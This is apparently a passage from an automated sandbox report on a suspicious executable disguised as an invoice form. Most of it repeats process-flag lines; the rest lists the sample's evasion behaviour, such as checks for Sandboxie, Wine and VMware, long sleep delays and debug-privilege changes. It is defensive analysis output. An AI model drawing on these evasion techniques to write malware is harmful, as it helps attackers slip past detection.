            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: 00000000.00000002.259503560.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: INV.2022LB0362 FORM CO (2).exe PID: 6092, type: MEMORYSTR
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.259503560.0000000002C1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.259503560.0000000002C1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe TID: 6096Thread sleep time: -42186s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe TID: 6068Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe TID: 6128Thread sleep time: -480000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeThread delayed: delay time: 42186Jump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeThread delayed: delay time: 60000Jump to behavior
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.259503560.0000000002C1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.259503560.0000000002C1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.259503560.0000000002C1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.259503560.0000000002C1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess created: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess created: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess created: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
